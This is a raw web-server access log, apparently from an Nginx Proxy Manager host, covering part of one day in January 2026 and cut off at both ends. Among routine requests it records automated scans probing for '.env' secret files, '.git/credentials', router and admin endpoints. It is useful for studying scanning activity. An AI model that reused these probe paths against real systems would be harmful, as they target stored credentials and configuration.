Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[13/Jan/2026:13:09:53 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:13:15:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:13:23:55 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:13:28:44 +0000] 200 - GET http 92.249.249.197 "/" [Client 65.49.1.192] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36" "-" +[13/Jan/2026:13:29:55 +0000] 404 - GET http 92.249.249.197 "/webui/" [Client 65.49.1.192] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36" "-" +[13/Jan/2026:13:31:13 +0000] 404 - GET http 92.249.249.197 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:13:31:29 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[13/Jan/2026:13:32:12 +0000] 404 - GET http 92.249.249.197 "/geoserver/web/" [Client 65.49.1.192] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36" "-" +[13/Jan/2026:13:33:41 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:13:35:16 +0000] 200 - GET http 92.249.249.197 "/?XDEBUG_SESSION_START=phpstorm" [Client 79.124.40.174] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[13/Jan/2026:13:49:21 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[13/Jan/2026:13:58:25 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:14:04:12 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:14:10:23 +0000] 400 - GET http 92.249.249.197 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[13/Jan/2026:14:26:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:14:36:41 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[13/Jan/2026:14:48:47 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:14:50:37 +0000] 404 - GET http 92.249.249.197 "/admin/config.php" [Client 102.22.20.125] [Length 150] [Gzip -] "xfa1,nvdorz,nvd0rz" "-" +[13/Jan/2026:14:52:28 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:14:52:29 +0000] 404 - GET http 92.249.249.197 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:14:54:32 +0000] 405 - POST http 92.249.249.197 "/" [Client 87.121.84.24] [Length 556] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[13/Jan/2026:14:54:32 +0000] 405 - POST http 92.249.249.197 "/" [Client 87.121.84.24] [Length 556] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[13/Jan/2026:14:54:39 +0000] 404 - POST http 92.249.249.197 "/_next" [Client 87.121.84.24] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[13/Jan/2026:14:54:39 +0000] 404 - POST http 92.249.249.197 "/_next" [Client 87.121.84.24] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[13/Jan/2026:14:54:46 +0000] 404 - POST http 92.249.249.197 "/api" [Client 87.121.84.24] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36" "-" +[13/Jan/2026:14:54:47 +0000] 404 - POST http 92.249.249.197 "/api" [Client 87.121.84.24] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0" "-" +[13/Jan/2026:14:54:53 +0000] 404 - POST http 92.249.249.197 "/_next/server" [Client 87.121.84.24] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[13/Jan/2026:14:54:53 +0000] 404 - POST http 92.249.249.197 "/_next/server" [Client 87.121.84.24] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[13/Jan/2026:14:54:58 +0000] 404 - POST http 92.249.249.197 "/app" [Client 87.121.84.24] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0" "-" +[13/Jan/2026:14:54:58 +0000] 404 - POST http 92.249.249.197 "/app" [Client 87.121.84.24] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36" "-" +[13/Jan/2026:14:55:03 +0000] 404 - POST http 92.249.249.197 "/api/route" [Client 87.121.84.24] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[13/Jan/2026:14:55:03 +0000] 404 - POST http 92.249.249.197 "/api/route" [Client 87.121.84.24] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36" "-" +[13/Jan/2026:14:58:34 +0000] 404 - GET http 92.249.249.197 "/actuator/gateway/routes" [Client 79.124.40.174] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[13/Jan/2026:15:01:41 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:15:02:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 65.49.1.232] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:15:09:58 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[13/Jan/2026:15:17:03 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:15:31:00 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[13/Jan/2026:15:39:22 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:15:39:58 +0000] 400 - - http localhost "-" [Client 138.68.145.7] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:15:39:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 138.68.145.7] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:15:50:55 +0000] 404 - GET http 92.249.249.197 "/.git/credentials" [Client 195.178.110.246] [Length 122] [Gzip 1.35] "MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23" "-" +[13/Jan/2026:15:53:43 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:15:53:52 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 167.94.146.62] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[13/Jan/2026:15:53:52 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.146.62] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:15:53:53 +0000] 400 - GET http profibot.direct.quickconnect.to "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[13/Jan/2026:15:53:57 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.146.62] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:15:56:35 +0000] 200 - GET http 92.249.249.197 "/" [Client 44.252.100.122] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[13/Jan/2026:16:05:51 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:16:19:55 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:16:20:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 79.124.40.174] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:16:21:59 +0000] 404 - GET http 92.249.249.197 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:16:22:23 +0000] 400 - GET http profibot.direct.quickconnect.to "/" [Client 66.132.153.140] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[13/Jan/2026:16:22:24 +0000] 400 - - http localhost "-" [Client 66.132.153.140] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:16:32:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:16:36:13 +0000] 200 - GET http 92.249.249.197 "/" [Client 91.224.92.14] [Length 1033] [Gzip -] "-" "-" +[13/Jan/2026:16:41:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 18.97.5.94] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/56.0.3070.106 Safari/537.32" "-" +[13/Jan/2026:16:47:43 +0000] 400 - GET http 92.249.249.197 "/" [Client 152.32.247.22] [Length 252] [Gzip -] "curl/7.29.0" "-" +[13/Jan/2026:16:47:45 +0000] 400 - - http localhost "-" [Client 152.32.247.22] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:16:47:59 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:16:48:03 +0000] 400 - GET http 92.249.249.197 "/" [Client 165.154.120.253] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 8_1_2; Win64; x64) AppleWebKit/587.43 (KHTML, like Gecko) Chrome/104.0.2942 Safari/537.36" "-" +[13/Jan/2026:16:48:04 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 165.154.120.253] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[13/Jan/2026:16:48:04 +0000] 400 - GET http 92.249.249.197 "/sitemap.xml" [Client 165.154.120.253] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[13/Jan/2026:16:48:04 +0000] 400 - GET http 92.249.249.197 "/robots.txt" [Client 165.154.120.253] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[13/Jan/2026:16:55:40 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:17:19:17 +0000] 404 - GET http 92.249.249.197 "/.git/index" [Client 185.241.208.170] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-" +[13/Jan/2026:17:21:22 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:17:37:00 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:17:40:48 +0000] 404 - GET http 92.249.249.197 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:17:47:24 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:17:54:55 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:18:10:09 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; BOIE9;ENUSMSE; rv:11.0) like Gecko" "-" +[13/Jan/2026:18:10:09 +0000] 404 - GET http 92.249.249.197 "/.env-react.log" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 3.0)" "-" +[13/Jan/2026:18:10:09 +0000] 404 - GET http 92.249.249.197 "/.env.mail_keys" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/4.0 (Windows 98; US) Opera 10.00 [en]" "-" +[13/Jan/2026:18:10:09 +0000] 404 - GET http 92.249.249.197 "/.env-allowlist" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19" "-" +[13/Jan/2026:18:10:10 +0000] 404 - GET http 92.249.249.197 "/.env-sequelize" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[13/Jan/2026:18:10:10 +0000] 404 - GET http 92.249.249.197 "/.env-constants" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Linux i686; rv:54.0) Gecko/20100101 Firefox/54.0" "-" +[13/Jan/2026:18:10:10 +0000] 404 - GET http 92.249.249.197 "/.env-aws-creds" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.1.1; LGL62VL Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36" "-" +[13/Jan/2026:18:10:10 +0000] 404 - GET http 92.249.249.197 "/.env-proxy.log" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14" "-" +[13/Jan/2026:18:10:10 +0000] 404 - GET http 92.249.249.197 "/.env-tasks.yml" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "-" +[13/Jan/2026:18:10:10 +0000] 404 - GET http 92.249.249.197 "/.env.token.bak" [Client 78.153.140.224] [Length 150] [Gzip -] "Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.5.22 Version/10.50" "-" +[13/Jan/2026:18:10:11 +0000] 404 - GET http 92.249.249.197 "/.env-workspace" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; rv:38.0) Gecko/20100101 Firefox/38.0" "-" +[13/Jan/2026:18:10:11 +0000] 404 - GET http 92.249.249.197 "/.env.mail.json" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1" "-" +[13/Jan/2026:18:10:11 +0000] 404 - GET http 92.249.249.197 "/.env-prod.conf" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "-" +[13/Jan/2026:18:10:11 +0000] 404 - GET http 92.249.249.197 "/.env-test-data" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64) Gecko/2008072820 Firefox/3.0.1" "-" +[13/Jan/2026:18:10:11 +0000] 404 - GET http 92.249.249.197 "/.env.example.1" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB6 (.NET CLR 3.5.30729)" "-" +[13/Jan/2026:18:10:12 +0000] 404 - GET http 92.249.249.197 "/.env.example.2" [Client 78.153.140.224] [Length 150] [Gzip -] "Dalvik/2.1.0 (Linux; U; Android 5.0.2; SM-T530NU Build/LRX22G)" "-" +[13/Jan/2026:18:10:12 +0000] 404 - GET http 92.249.249.197 "/.env-rules.log" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.7) Gecko/20060911 Firefox/1.5.0.7" "-" +[13/Jan/2026:18:12:11 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:18:30:42 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:18:31:10 +0000] 200 - GET http 92.249.249.197 "/" [Client 137.184.110.84] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[13/Jan/2026:18:31:10 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[13/Jan/2026:18:37:43 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:18:43:32 +0000] 405 - POST http 92.249.249.197 "/" [Client 195.24.236.36] [Length 154] [Gzip -] "Mozilla/5.0" "-" +[13/Jan/2026:18:45:53 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" "-" +[13/Jan/2026:18:48:05 +0000] 400 - - http localhost "-" [Client 20.65.154.130] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:18:51:29 +0000] 200 - GET http 92.249.249.197 "/" [Client 3.89.221.211] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[13/Jan/2026:19:00:25 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:19:10:35 +0000] 404 - POST http 92.249.249.197 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://92.249.249.197:80/home.asp" +[13/Jan/2026:19:16:05 +0000] 404 - GET http 92.249.249.197 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:19:21:57 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:19:22:23 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[13/Jan/2026:19:25:51 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:19:28:44 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:19:29:57 +0000] 200 - GET http 92.249.249.197 "/" [Client 86.54.31.40] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" +[13/Jan/2026:19:29:57 +0000] 404 - GET http 92.249.249.197 "/robots.txt" [Client 86.54.31.40] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:19:29:58 +0000] 404 - GET http 92.249.249.197 "/sitemap.xml" [Client 86.54.31.40] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:19:29:58 +0000] 404 - GET http 92.249.249.197 "/.well-known/security.txt" [Client 86.54.31.40] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:19:29:59 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[13/Jan/2026:19:35:20 +0000] 404 - GET http profibot.direct.quickconnect.to "/robots.txt" [Client 44.234.56.174] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[13/Jan/2026:19:35:20 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 44.234.56.174] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[13/Jan/2026:19:43:29 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[13/Jan/2026:19:46:30 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[13/Jan/2026:19:51:57 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:19:57:12 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[13/Jan/2026:19:58:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 88.214.25.124] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:20:16:17 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:20:19:40 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:20:19:44 +0000] 404 - GET http 92.249.249.197 "/.git/config" [Client 